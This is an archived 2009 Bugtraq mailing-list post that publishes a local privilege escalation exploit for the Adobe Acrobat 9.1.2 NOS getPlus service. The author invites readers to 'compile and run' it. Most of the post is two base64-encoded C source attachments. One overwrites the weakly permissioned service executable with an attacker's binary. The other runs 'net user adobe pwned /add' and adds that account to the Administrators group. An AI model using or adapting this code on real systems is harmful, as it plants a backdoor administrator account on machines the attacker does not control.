 | ||||
| << Previous | INDEX | Search | src / Print | Next >> |
| ||||
| |||||||||||||||
Date: Tue, 21 Jul 2009 16:56:45 -0400 Subject: Adobe Acrobat 9.1.2 NOS Local Privilege Escalation Exploit From: Jeremy Brown <0xjbrown41@gmail.com.> To: bugtraq@securityfocus.com Content-Type: multipart/mixed; boundary=001636c59909102820046f3d7eb7 X-Virus-Scanned: antivirus-gw at tyumen.ru --001636c59909102820046f3d7eb7 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Adobe Acrobat 9.1.2 NOS Local Privilege Escalation Exploit This exploit is based on the brief information provided by Nine:Situations:Group (http://www.milw0rm.com/exploits/9199). Exploiting improper permissions is fun. A few notes are in order though. The getPlus service (that I tested, via 9.1.2) isn't installed as an "Automatic" service, therefore making it slightly harder (but not hard) to practically use to your advantage. But I tested running this code under a GUEST account and it worked pretty good (just the first time though). Change the values as needed, compile and run. Things could be more or less silent, lethal or non-lethal... it is completely up to you. Things cannot get much simpler than this :) Tested on Windows XP SP3 + Adobe Acrobat 9.1.2 (installed from adobe's download manager, then updated). --001636c59909102820046f3d7eb7 Content-Type: text/x-csrc; charset=US-ASCII; name="alwaysdirtyneverclean.c" Content-Disposition: attachment; filename="alwaysdirtyneverclean.c" Content-Transfer-Encoding: base64 X-Attachment-Id: f_fxf3vnfg0 LyoNCmFsd2F5c2RpcnR5bmV2ZXJjbGVhbi5jDQpBS0ENCkFkb2JlIEFjcm9iYXQgOS4xLjIgTk9T IExvY2FsIFByaXZpbGVnZSBFc2NhbGF0aW9uIEV4cGxvaXQgKGFsd2F5c2RpcnR5bmV2ZXJjbGVh bi56aXApDQpCWQ0KSmVyZW15IEJyb3duIDIwMDkgWzB4amJyb3duNDFAZ21haWwuY29tXSAwNy4y MS4yMDA5DQoqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioq KioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioq Kg0KSSd2ZSBiZWVuIHVwIGZvciBuZWFybHkgMjQgaG91cnMgKG9ubHkgdGhlIGxhc3QgZmV3IGRv aW5nIHJlc2VhcmNoIHRob3VnaCkuIFRoaXMgZXhwbG9pdCBpcyBiYXNlZCBvbiB0aGUNCmJyaWVm IGluZm9ybWF0aW9uIHByb3ZpZGVkIGJ5IE5pbmU6U2l0dWF0aW9uczpHcm91cCAoaHR0cDovL3d3 dy5taWx3MHJtLmNvbS9leHBsb2l0cy85MTk5KS4gRXhwbG9pdGluZw0KaW1wcm9wZXIgcGVybWlz c2lvbnMgaXMgZnVuLiBBIGZldyBub3RlcyBhcmUgaW4gb3JkZXIgdGhvdWdoLiBUaGUgZ2V0UGx1 cyBzZXJ2aWNlICh0aGF0IEkgdGVzdGVkLCB2aWEgOS4xLjIpDQppc24ndCBpbnN0YWxsZWQgYXMg YW4gIkF1dG9tYXRpYyIgc2VydmljZSwgdGhlcmVmb3JlIG1ha2luZyBpdCBzbGlnaHRseSBoYXJk ZXIgKGJ1dCBub3QgaGFyZCkgdG8gcHJhY3RpY2FsbHkNCnVzZSB0byB5b3VyIGFkdmFudGFnZS4g QnV0IEkgdGVzdGVkIHJ1bm5pbmcgdGhpcyBjb2RlIHVuZGVyIGEgR1VFU1QgYWNjb3VudCBhbmQg aXQgd29ya2VkIHByZXR0eSBnb29kIChqdXN0DQp0aGUgZmlyc3QgdGltZSB0aG91Z2gpLiBDaGFu Z2UgdGhlIHZhbHVlcyBhcyBuZWVkZWQsIGNvbXBpbGUgYW5kIHJ1bi4gVGhpbmdzIGNvdWxkIGJl IG1vcmUgb3IgbGVzcyBzaWxlbnQsDQpsZXRoYWwgb3Igbm9uLWxldGhhbC4uLiBpdCBpcyBjb21w bGV0ZWx5IHVwIHRvIHlvdS4gVGhpbmdzIGNhbm5vdCBnZXQgbXVjaCBzaW1wbGVyIHRoYW4gdGhp cyA6KQ0KDQpUZXN0ZWQgb24gV2luZG93cyBYUCBTUDMgKyBBZG9iZSBBY3JvYmF0IDkuMS4yIChp bnN0YWxsZWQgZnJvbSBhZG9iZSdzIGRvd25sb2FkIG1hbmFnZXIsIHRoZW4gdXBkYXRlZCkNCg0K QnV0IG1heWJlIGdpdmUgQWRvYmUgYSBicmVhaz8gMjAwOSBoYXMgYmVlbiBhIHJvdWdoIHllYXIg Zm9yIHRoZW0gYWxyZWFkeSwgaGVoLiBTbGVlcCB0aW1lLg0KKioqKioqKioqKioqKioqKioqKioq KioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioq KioqKioqKioqKioqKioqKioqKioqKioqKioqKioNCmFsd2F5c2RpcnR5bmV2ZXJjbGVhbi5jDQoq Lw0KDQojaW5jbHVkZSA8c3RkaW8uaD4NCiNpbmNsdWRlIDx3aW5kb3dzLmg+DQoNCiNkZWZpbmUg REVGQVVMVF9UQVJHRVQgICJDOlxcUHJvZ3JhbSBGaWxlc1xcTk9TXFxiaW5cXEdldFBsdXNfSGVs cGVyU3ZjLmV4ZSINCiNkZWZpbmUgREVGQVVMVF9CQUNLVVAgICJDOlxcUHJvZ3JhbSBGaWxlc1xc Tk9TXFxiaW5cXEdldFBsdXNfSGVscGVyU3ZjLmV4ZS5iYWsiDQojZGVmaW5lIERFRkFVTFRfRVhF Q1VURSAiQzpcXERvY3VtZW50cyBhbmQgU2V0dGluZ3NcXEFsbCBVc2Vyc1xcRG9jdW1lbnRzXFxi aW4uZXhlIg0KLy8jZGVmaW5lIERFRkFVTFRfRVhFQ1VURSAiQzpcXFdJTkRPV1NcXHN5c3RlbTMy XFxjYWxjLmV4ZSINCg0KaW50IG1haW4oaW50IGFyZ2MsIGNoYXIgKmFyZ3ZbXSkNCnsNCg0KICAg ICBNb3ZlRmlsZShERUZBVUxUX1RBUkdFVCwgREVGQVVMVF9CQUNLVVApOw0KICAgICBDb3B5Rmls ZShERUZBVUxUX0VYRUNVVEUsIERFRkFVTFRfVEFSR0VULCBGQUxTRSk7DQogICAgIC8vIHNoYWtl ZSBhbmQgYmFrZWVlDQoNCiAgICAgcmV0dXJuIDA7DQoNCn0NCg== --001636c59909102820046f3d7eb7 Content-Type: text/x-csrc; charset=US-ASCII; name="bin.c" Content-Disposition: attachment; filename="bin.c" Content-Transfer-Encoding: base64 X-Attachment-Id: f_fxf3w33f1 LyoNCmJpbi5jDQpGUk9NDQpBZG9iZSBBY3JvYmF0IDkuMS4yIE5PUyBMb2NhbCBQcml2aWxlZ2Ug RXNjYWxhdGlvbiBFeHBsb2l0IChhbHdheXNkaXJ0eW5ldmVyY2xlYW4uemlwKQ0KQlkNCkplcmVt eSBCcm93biAyMDA5IFsweGpicm93bjQxQGdtYWlsLmNvbV0gMDcuMjEuMjAwOQ0KKi8NCg0KI2lu Y2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8d2luZG93cy5oPg0KDQojZGVmaW5lIENNRCAiQzpc XFdJTkRPV1NcXHN5c3RlbTMyXFxjbWQuZXhlIg0KI2RlZmluZSBPTkUgIi9DIG5ldCB1c2VyIGFk b2JlIHB3bmVkIC9hZGQiDQojZGVmaW5lIFRXTyAiL0MgbmV0IGxvY2FsZ3JvdXAgYWRtaW5pc3Ry YXRvcnMgYWRvYmUgL2FkZCINCg0KaW50IG1haW4oaW50IGFyZ2MsIGNoYXIgKmFyZ3ZbXSkNCnsN Cg0KU1RBUlRVUElORk8gc2kgPSB7c2l6ZW9mKFNUQVJUVVBJTkZPKX07DQpQUk9DRVNTX0lORk9S TUFUSU9OIHBpOw0KDQogICAgIENyZWF0ZVByb2Nlc3MoQ01ELCBPTkUsIE5VTEwsIE5VTEwsIDAs IDAsIE5VTEwsIE5VTEwsICZzaSwgJnBpKTsNCiAgICAgQ3JlYXRlUHJvY2VzcyhDTUQsIFRXTywg TlVMTCwgTlVMTCwgMCwgMCwgTlVMTCwgTlVMTCwgJnNpLCAmcGkpOw0KICAgICAvLyBtbW1tbW1t bW1tbS4uIGNob2NvbGF0ZSBicm93aWUgaWNlIGNyZWFtIHNtb290aGVzIGFyZSBnb29vb29kDQoN CiAgICAgcmV0dXJuIDA7DQoNCn0NCg== --001636c59909102820046f3d7eb7--
| |||||||||||||||
|
|
|
